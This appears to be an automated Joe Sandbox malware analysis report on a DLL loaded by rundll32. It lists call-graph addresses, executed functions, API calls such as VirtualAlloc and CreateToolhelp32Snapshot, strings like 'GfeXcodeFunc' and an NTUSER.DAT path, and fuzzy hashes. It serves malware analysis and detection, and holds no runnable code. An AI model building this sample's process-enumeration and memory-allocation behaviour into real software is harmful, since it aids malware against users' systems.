83225->83283 83226 180002acb 83228 180002af6 83226->83228 83299 1800023f0 65 API calls 2 library calls 83226->83299 83300 1800038d0 90 API calls _RunAllParam 83228->83300 83230 1800028a5 83284 180006db0 99 API calls 3 library calls 83230->83284 83233 1800028bd 83285 180006db0 99 API calls 3 library calls 83233->83285 83234 180002b22 std::ios_base::_Ios_base_dtor 83236 18002cc10 _wsetlocale_set_cat 7 API calls 83234->83236 83238 180002b7a 83236->83238 83237 1800028e2 83286 1800062f0 65 API calls 3 library calls 83237->83286 83238->83178 83240 18000292b 83287 180003260 111 API calls 5 library calls 83240->83287 83242 180002939 83288 180006db0 99 API calls 3 library calls 83242->83288 83244 180002951 83289 180006db0 99 API calls 3 library calls 83244->83289 83246 180002999 83290 1800062f0 65 API calls 3 library calls 83246->83290 83248 1800029bf 83291 180003260 111 API calls 5 library calls 83248->83291 83250 1800029cd 83292 180006db0 99 API calls 3 library calls 83250->83292 83252 1800029e5 83293 180006db0 99 API calls 3 library calls 83252->83293 83254 180002a2d 83294 1800062f0 65 API calls 3 library calls 83254->83294 83256 180002a53 83295 180003260 111 API calls 5 library calls 83256->83295 83258 180002a61 83296 180006db0 99 API calls 3 library calls 83258->83296 83260 180002a79 83297 180006db0 99 API calls 3 library calls 83260->83297 83263 180002d06 83262->83263 83264 180002d2e 83262->83264 83301 1800062f0 65 API calls 3 library calls 83263->83301 83302 1800062f0 65 API calls 3 library calls 83264->83302 83267 18002cc10 _wsetlocale_set_cat 7 API calls 83268 180002e8a 83267->83268 83268->83212 83269 180002d29 _Strxfrm 83269->83267 83270 180002d79 _DllMainCRTStartup 83270->83269 83303 180003890 65 API calls messages 83270->83303 83304 180002510 70 API calls 3 library calls 83272->83304 83274 180005f8f _DllMainCRTStartup 83305 180006940 99 API calls 6 library calls 83274->83305 83276 180005fb1 83277 180002810 83276->83277 83306 1800023f0 65 API calls 2 library calls 83276->83306 83279 1800051b0 70 API calls _DllMainCRTStartup 83277->83279 83279->83217 83280->83219 83281->83220 83282->83225 83283->83230 83284->83233 83285->83237 83286->83240 83287->83242 83288->83244 83289->83246 83290->83248 83291->83250 83292->83252 83293->83254 83294->83256 83295->83258 83296->83260 83297->83221 83298->83226 83299->83228 83300->83234 83301->83269 83302->83270 83303->83269 83304->83274 83305->83276 83306->83277 83307 180002c30 VirtualAllocExNuma 83308 180002c80 83307->83308

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007DF496590100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2412276165.00007DF496590000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF496590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_7df496590000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateSnapshotToolhelp32
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 3332741929-2766056989
                                                                                                                                  • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                  • Instruction ID: ec187bbac26670864484b36c357e7c8e44bf3f94dbc9e4d3789add524fdda48e
                                                                                                                                  • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                  • Instruction Fuzzy Hash: F571F03160494C8FEF94EF6CD848BA937E1FB98365F50462AE81EC72A0DB74D954CB80
                                                                                                                                  Function 00007DF496590000 Relevance: 4.6, APIs: 3, Instructions: 88processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2412276165.00007DF496590000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF496590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_7df496590000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2353314856-0
                                                                                                                                  • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                  • Instruction ID: b40be1f42a36e4ead5d007aa360b35f4b26dec9c6396a70d7593ab29803aa538
                                                                                                                                  • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                  • Instruction Fuzzy Hash: 4521BC3071494C8FEBA1EF5CD858BEA33E1EB98320F40422AD41EDB290DE359A448750
                                                                                                                                  Function 00007FFD92DCA250 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 640memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 145 7ffd92dca250-7ffd92dca270 146 7ffd92dca273-7ffd92dca2e1 145->146 149 7ffd92dca2e2-7ffd92dca2ed 146->149 149->149 150 7ffd92dca2ef-7ffd92dca2fc 149->150 150->146 151 7ffd92dca302-7ffd92dca35d 150->151
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID: +=
                                                                                                                                  • API String ID: 4275171209-1123256139
                                                                                                                                  • Opcode ID: 97e9a56a448ecaa7363e47874dce10fabfe0d6ccf1fb59d6a2af93f8f1d517d2
                                                                                                                                  • Instruction ID: a5afb22cb88eeb290df7999dee5b6a868f47fc1c8660f21ee825c4601b754c91
                                                                                                                                  • Opcode Fuzzy Hash: 97e9a56a448ecaa7363e47874dce10fabfe0d6ccf1fb59d6a2af93f8f1d517d2
                                                                                                                                  • Instruction Fuzzy Hash: 43C1ADE37613683AFD1B86A67E16FAD94025B52BF5C5093317D390ABCAF13C68CB8540
                                                                                                                                  Function 00007FFD92DCA3C0 Relevance: 1.6, APIs: 1, Instructions: 306memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 156 7ffd92dca3c0-7ffd92dca69e VirtualAlloc
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 8cb194e6ffdbc4f4ebece6793a7d4bb003f80c8fce03c4cbf3f4b683e7597c4b
                                                                                                                                  • Instruction ID: 389feeaa012dc3922a08e29dc5e6084110eacfa6bf5b45f30e8ddc8a16230d29
                                                                                                                                  • Opcode Fuzzy Hash: 8cb194e6ffdbc4f4ebece6793a7d4bb003f80c8fce03c4cbf3f4b683e7597c4b
                                                                                                                                  • Instruction Fuzzy Hash: A751D2E3B713582AF91B86AA7D16FAD90029B52BF5C5493317D3906BCAF13C68CB8540
                                                                                                                                  Function 00007FFD92DCA4C0 Relevance: 1.4, APIs: 1, Instructions: 140memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 158 7ffd92dca4c0-7ffd92dca69e VirtualAlloc
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 0d2d5d6dfa6f50465e0a3596790292fef24e24249b2b6cf750ec3e9fa2e6afe6
                                                                                                                                  • Instruction ID: 6a5f8257ce671462ed7a5e973fb7f74aa322d97e317348862fb750fc507a4fc4
                                                                                                                                  • Opcode Fuzzy Hash: 0d2d5d6dfa6f50465e0a3596790292fef24e24249b2b6cf750ec3e9fa2e6afe6
                                                                                                                                  • Instruction Fuzzy Hash: 6F2102E3B603183BF91B86BA3D12FBD50029B52BF5C50A3217D3916BC6E13C69CB8640
                                                                                                                                  Function 000001DA0319D270 Relevance: .0, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2186898111.000001DA03160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA03160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_1da03160000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                  • Instruction ID: 42fd085fa24732cb5e5746ad1bc58dc9668683d05e20af23999916fc2571c101
                                                                                                                                  • Opcode Fuzzy Hash: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                  • Instruction Fuzzy Hash: EEF08170628B408BE744DF18848967677E1FB9C755F64452FF88A87361CB3598428B43
                                                                                                                                  Function 000001DA0319D2E0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2186898111.000001DA03160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA03160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_1da03160000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                  • Instruction ID: 64398325787a1d522fcd83cdd95f9caf8b04510a30ee92bc71944dce18a02d21
                                                                                                                                  • Opcode Fuzzy Hash: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                  • Instruction Fuzzy Hash: 92F05470A28F444BDB08EF2C888A67577E1FBAC745F54462FA449C7361DB35E5428B83
                                                                                                                                  Function 00000001800026C0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 269stringCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 1800026c0-18000280b call 180002cb0 call 18002f4a0 * 3 GetModuleFileNameW SHGetSpecialFolderPathW lstrcatW * 4 call 180005f70 10 180002810-180002858 call 1800051b0 call 180005250 0->10 15 18000285a-180002872 10->15 16 180002880-180002885 10->16 17 180002874 15->17 18 180002877-18000287f call 1800023f0 15->18 19 180002ac1-180002ace call 180005360 16->19 20 18000288b-1800028ab call 180006a80 call 180003260 16->20 17->18 18->16 28 180002af7-180002b5d call 1800038d0 call 180007928 19->28 29 180002ad0-180002ae9 19->29 36 1800028ad 20->36 37 1800028b0-1800028c6 call 180006db0 20->37 45 180002b6b-180002b92 call 18002cc10 28->45 46 180002b5f-180002b66 call 18002e8fc 28->46 32 180002aeb 29->32 33 180002aee-180002af6 call 1800023f0 29->33 32->33 33->28 36->37 43 1800028d1-1800028fa call 180006db0 37->43 44 1800028c8-1800028cc call 18002e8fc 37->44 53 180002901-18000290c 43->53 54 1800028fc-1800028ff 43->54 44->43 46->45 56 180002910-180002919 53->56 55 18000291b-18000293f call 1800062f0 call 180003260 54->55 61 180002941 55->61 62 180002944-18000295a call 180006db0 55->62 56->55 56->56 61->62 65 180002965-18000297d 62->65 66 18000295c-180002960 call 18002e8fc 62->66 68 180002988-1800029d3 call 180006db0 call 1800062f0 call 180003260 65->68 69 18000297f-180002983 call 18002e8fc 65->69 66->65 77 1800029d5 68->77 78 1800029d8-1800029ee call 180006db0 68->78 69->68 77->78 81 1800029f9-180002a11 78->81 82 1800029f0-1800029f4 call 18002e8fc 78->82 84 180002a13-180002a17 call 18002e8fc 81->84 85 180002a1c-180002a67 call 180006db0 call 1800062f0 call 180003260 81->85 82->81 84->85 93 180002a69 85->93 94 180002a6c-180002a82 call 180006db0 85->94 93->94 97 180002a84-180002a88 call 18002e8fc 94->97 98 180002a8d-180002aa5 94->98 97->98 100 180002aa7-180002aab call 18002e8fc 98->100 101 180002ab0-180002abc call 180006db0 98->101 100->101 101->19
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileModuleName$FolderIos_base_dtorPathSpecialstd::ios_base::_
                                                                                                                                  • String ID: GfeXcodeFunc$\NTUSER.DAT.Not
                                                                                                                                  • API String ID: 2606783807-3673055099
                                                                                                                                  • Opcode ID: f4fb330f2fce6a57cdb251511d5a633e98aa520d2ba9185056906fd6c2a3254f
                                                                                                                                  • Instruction ID: 5b91f0b68c497ecbefdd096ad22c36a01d1dfa7b74f7b8fae1d4cb91b2026b10
                                                                                                                                  • Opcode Fuzzy Hash: f4fb330f2fce6a57cdb251511d5a633e98aa520d2ba9185056906fd6c2a3254f
                                                                                                                                  • Instruction Fuzzy Hash: 0EE15B32224B8989EBA1DF24D8943DD3761F7897C8F809126F64D47AA9DF74C64DC740
                                                                                                                                  Function 000001DA01410B00 Relevance: 4.1, APIs: 3, Instructions: 371memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4592950432.000001DA01410000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA01410000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_1da01410000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 7479d515978b8398c8f18a7fbb8c6ce0b9f2a044b6e8d29228c90f9ede51720f
                                                                                                                                  • Instruction ID: 3097cb72f0922a06ad7a5174e4c6cdbd2d0da02130edcc4ed136175ce34d3a57
                                                                                                                                  • Opcode Fuzzy Hash: 7479d515978b8398c8f18a7fbb8c6ce0b9f2a044b6e8d29228c90f9ede51720f
                                                                                                                                  • Instruction Fuzzy Hash: 0BE11C70258B488FE794DB18C098BAAB7E0FB9C355F90495EF489C7265D775E8C1CB02
                                                                                                                                  Function 000001DA0319BE60 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.2186898111.000001DA03160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA03160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_1da03160000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                  • Opcode ID: 493f5e9feb3bc185952b791932f3846df56847a002a59b7567bfb59bfa631270
                                                                                                                                  • Instruction ID: 0c26bc3a46d65ebbea6de167f53e8b8fc692a766b1b1c82f4b648b258d0946a3
                                                                                                                                  • Opcode Fuzzy Hash: 493f5e9feb3bc185952b791932f3846df56847a002a59b7567bfb59bfa631270
                                                                                                                                  • Instruction Fuzzy Hash: 6FB1723121CA088FDB54EF1CD885B9AB7E1FF99310F55456EE48AC7291DB34E845CB82
                                                                                                                                  Function 0000000180002C30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 152 180002c30-180002c79 VirtualAllocExNuma 153 180002c80-180002c98 152->153 153->153 154 180002c9a-180002ca2 153->154
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocNumaVirtual
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4233825816-2766056989
                                                                                                                                  • Opcode ID: dbe35d2df203950de36ddcf7fe5b798376a89fd65d5bb236196afd6b07239e44
                                                                                                                                  • Instruction ID: 34f6e7e5ba55535552e86dfb8aea1c9c237241a7d285d051a1eb680f4a1854f4
                                                                                                                                  • Opcode Fuzzy Hash: dbe35d2df203950de36ddcf7fe5b798376a89fd65d5bb236196afd6b07239e44
                                                                                                                                  • Instruction Fuzzy Hash: E5F0F03231A1C585E7918B75A811B896EA0A7867A8F698305EB7C427D0DA3D8309CB00
                                                                                                                                  Function 00007FFD92DCA5A0 Relevance: 1.3, APIs: 1, Instructions: 51memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 159 7ffd92dca5a0-7ffd92dca60f VirtualAlloc
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 17eed5974d73b5d85aa82098f38f35d8dd9d716a6e7e215ce0e9f7d452ed3bce
                                                                                                                                  • Instruction ID: 4f29dad2a492d62e1c88ec3c46989233f4dcf519ae0428be478fb385e7a8fcee
                                                                                                                                  • Opcode Fuzzy Hash: 17eed5974d73b5d85aa82098f38f35d8dd9d716a6e7e215ce0e9f7d452ed3bce
                                                                                                                                  • Instruction Fuzzy Hash: 7EF0A0E3B252543AFA038AA67C01FBE55211742BF4E1493313E3822BC5E43899CB8600

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00007FFD92ED2E50 Relevance: 77.4, APIs: 37, Strings: 7, Instructions: 389memorylibraryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
